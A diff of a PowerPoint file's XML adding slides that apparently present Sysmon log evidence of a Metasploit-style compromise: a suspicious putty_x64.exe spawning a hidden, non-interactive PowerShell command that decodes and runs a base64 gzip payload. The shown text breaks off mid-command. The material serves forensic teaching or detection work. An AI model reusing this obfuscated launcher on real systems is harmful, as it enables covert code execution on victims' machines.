+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>LogonId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 0x33832</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>TerminalSessionId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>IntegrityLevel</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: High</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>Hashes: SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ParentProcessGuid</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: {9CA6D9DA-9495-5C9A-0000-00108C710901}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ParentProcessId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 7660</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ParentImage</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: C:\Users\user\Desktop\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0"/>
+              <a:t>putty_x64.exe</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ParentCommandLine</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: ""C:\Users\user\Desktop\putty_x64.exe"" ";"1";"5";;"4";"1";"0";"-9223372036854775808";"589771";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:42";;;"Microsoft-Windows-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>Sysmon</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ProcessCreate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>System.String</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>]";"System.Collections.Generic.List`1[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>]"</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="Nadpis 10">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13FAC93-3D71-450F-A35B-84C6B766BAAD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="210313"/>
+            <a:ext cx="12192000" cy="585926"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="5400" dirty="0"/>
               <a:t>METASPLOIT PROCESS</a:t>
             </a:r>
           </a:p>
@@ -7196,7 +11053,73 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="Obrázek 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E70F9D99-4B42-41B6-AC0E-3C7DE3699F2D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2650632" y="0"/>
+            <a:ext cx="6890735" cy="6858000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2657531265"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide9.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>

--- a/LastMinute.pptx
+++ b/LastMinute.pptx
@@ -9,11 +9,16 @@
     <p:sldId id="265" r:id="rId3"/>
     <p:sldId id="263" r:id="rId4"/>
     <p:sldId id="264" r:id="rId5"/>
-    <p:sldId id="257" r:id="rId6"/>
-    <p:sldId id="258" r:id="rId7"/>
-    <p:sldId id="259" r:id="rId8"/>
-    <p:sldId id="266" r:id="rId9"/>
-    <p:sldId id="260" r:id="rId10"/>
+    <p:sldId id="267" r:id="rId6"/>
+    <p:sldId id="268" r:id="rId7"/>
+    <p:sldId id="269" r:id="rId8"/>
+    <p:sldId id="270" r:id="rId9"/>
+    <p:sldId id="271" r:id="rId10"/>
+    <p:sldId id="257" r:id="rId11"/>
+    <p:sldId id="258" r:id="rId12"/>
+    <p:sldId id="259" r:id="rId13"/>
+    <p:sldId id="266" r:id="rId14"/>
+    <p:sldId id="260" r:id="rId15"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -6235,6 +6240,1146 @@
 </p:sld>
 </file>
 
+<file path=ppt/slides/slide10.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="Obdélník 7">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1580769" y="982176"/>
+            <a:ext cx="10515600" cy="4893647"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>"Process Create:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>RuleName</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>UtcTime</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: 2019-03-26 21:14:44.276</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Image: C:\Windows\System32\conhost.exe</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>FileVersion</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: 10.0.17134.1 (WinBuild.160101.0800)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Description: Console Window Host</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Product: Microsoft? Windows? Operating System</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Company: Microsoft Corporation</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>CommandLine</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: \??\C:\WINDOWS\system32\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>conhost.exe 0xffffffff -ForceV1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>CurrentDirectory</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: C:\WINDOWS</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>User: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>PC2\user</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IntegrityLevel</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: High</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Hashes: SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>ParentImage</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>ParentCommandLine</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: ""</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>powershell.exe</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>"" -noni -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>nop</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> -w </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>hidden</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> -c &amp;([</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>scriptblock</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>]::create((New-Object </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IO.StreamReader</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(New-Object </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IO.Compression.GzipStream</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>((New-Object </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IO.MemoryStream</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(,[Convert]::FromBase64String('H4sIAFuWmlwCA7VW/W+iSBj+uU36P5CNiZBaRWu7vSabHCAornRlUbR65kJhhFkHcGGo4t7+7/eOQLebbe92LzlCwny8n8/7zLyss8ilOI44/5r7cnZ6MnYSJ+T42mZ+3eBqIRZOTmC1Fut2yr3j+KW03fbi0MHR6vZWyZIERbSYN/uISmmKwgeCUcoL3F/cLEAJuvjw8Am5lPvC1f5s9kn84JBSLFccN0DchRR5bG8Uuw6LpGltCaZ8/+VTc79RPrZ2Kh7tN+/aUbV0e7uAIOHA7m6aIxT5NGiI+0tRhN4i7rsi5PjzaSnxNufBUIN1pgKWwjA5GhbY+a2lgTf/P8Eq74wAPt6/gvVt7R92fwpAsVEm/MP69wu/BOgvpj5zMAU5C649gorW+woCJTOe/Z2wskDl1+XDfi8/ZPTiDn5azk7/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>BrreYUTFCgAA</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>'))),[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
